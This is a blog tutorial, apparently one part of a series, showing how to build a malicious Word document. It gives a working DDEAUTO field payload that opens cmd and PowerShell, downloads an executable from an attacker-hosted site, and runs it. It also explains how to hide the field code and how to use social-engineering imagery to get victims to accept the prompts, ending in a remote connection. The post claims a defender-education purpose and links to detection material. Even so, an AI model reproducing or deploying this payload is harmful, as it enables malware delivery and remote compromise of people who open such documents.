Creating a Cyber Attack – Part 9 (Making a malicious Word document using DDE and Powershell)

In part one of this series we looked at making a malicious Word document using DDE, which l connected to our malicious site and automatically run malicious code to give us access to the victim, but also give us a fall back where the user is also prompted to install a secure file viewer should our automatic code not run. This gave us 2 chances to infect the victim machine.

This new updated version will show how we can use DDE and Powershell to download and run a malicious exe from a Word documents. We can create a document which when opened auto prompts the user to click a pop up, and then automatically connect to our malicious website to download and run Malware.

If you are a defender the most important thing to understand is how attacks like this work so you know what you are looking out for. With that in mind, let’s go make some Malware.

If you have not read the previous blogs of this series then I recommend you do as they will show how you create the malicious exe, and configure the malicious website. This blog will cover the code in the document, so if there is any part you don’t understand if you read the other blogs each part is explained in more detail. https://blog.2code-monte.co.uk/2020/09/26/making-a-malicious-word-document-part-1-dde-vulnerability-feature/

Here we start with the document already created just needing the DDE code for the exploit, we’ve added some images and text to try and socially engineer the victim user into thinking it is legitimate and click the pop up box. In this demo we will be using http://legitimate.website.com which is just a private test site for this demo, so you will need your own website to host the malware.

We open up our prepared Word document

The code we are going to insert is below

DDEAUTO c:\windows\system32\cmd.exe “/k powershell.exe
Invoke-WebRequest -Uri ‘http://legitimate.website.com/secure/secure.exe’
-OutFile ‘C:\Users\bradley.cain.testadmin-PC\Downloads\secure.exe’
;powershell.exe Start-Sleep -seconds 10;powershell.exe .\secure.exe”

  • DDEAUTO c:\windows\system32\cmd.exe “/k powershell.exe – This is where the DDE function first launches a command prompt, which then launches Powershell
  • Invoke-WebRequest -Uri ‘http://legitimate.website.com/secure/secure.exe’ – This tells powershell to connect to our website and get our malicious file
  • -OutFile ‘C:\Users\bradley.cain.testadmin-PC\Downloads\secure.exe’ – This tells Powershell where to save the file
  • ;powershell.exe Start-Sleep -seconds 10;powershell.exe .\secure.exe” – This tells powershell to wait 10 seconds before starting our malicious file, which ensures that the download has completed before trying to start the exe.

Move the cursor down the page so the code will not be visible when the document is opened and then click “Insert” from the ribbon menu, then “quick parts” then “Field” from the drop down menu. Ensure “=(Formula)” is selected then click OK.

This image has an empty alt attribute; its file name is DDEDoc2.png
This image has an empty alt attribute; its file name is DDEDoc3-1024x603.png

Then you should see the below in your document. This is our formula field

This image has an empty alt attribute; its file name is DDEDoc4.png

Right click and choose “Toggle Field Code”

This image has an empty alt attribute; its file name is DDEDoc5.png

Then you’ll see this;

This image has an empty alt attribute; its file name is DDEDoc6-1.png

Let paste in our code

We start our listener on our attackers device

Our victim opens the document and gets our pop up messages, which they can see by the guide behind that these are expected and to allow it. It’s an “Assured secure document” after all. 😉

That’s it, our program downloads and runs in the background without the user being aware, and the attacking machine gets it’s connection.

Finally to show we have a connection and are able to run commands we pop calculator to the desktop (obviously you would not do this as a real life attacker, it is shown here to prove we can execute commands on the victim machine).

Hope you enjoyed learning what is possible within DDEAUTO function, but this is a basic demo, we will come back and show an example of obfuscated powershell commands as a more real world example. If you are interested in learning how to spot this type of attack then take a look at our blog series on detecting cyber attacks. https://blog.2code-monte.co.uk/2021/02/26/detecting-a-cyber-attack-part-1-sysmon-endpoint-install/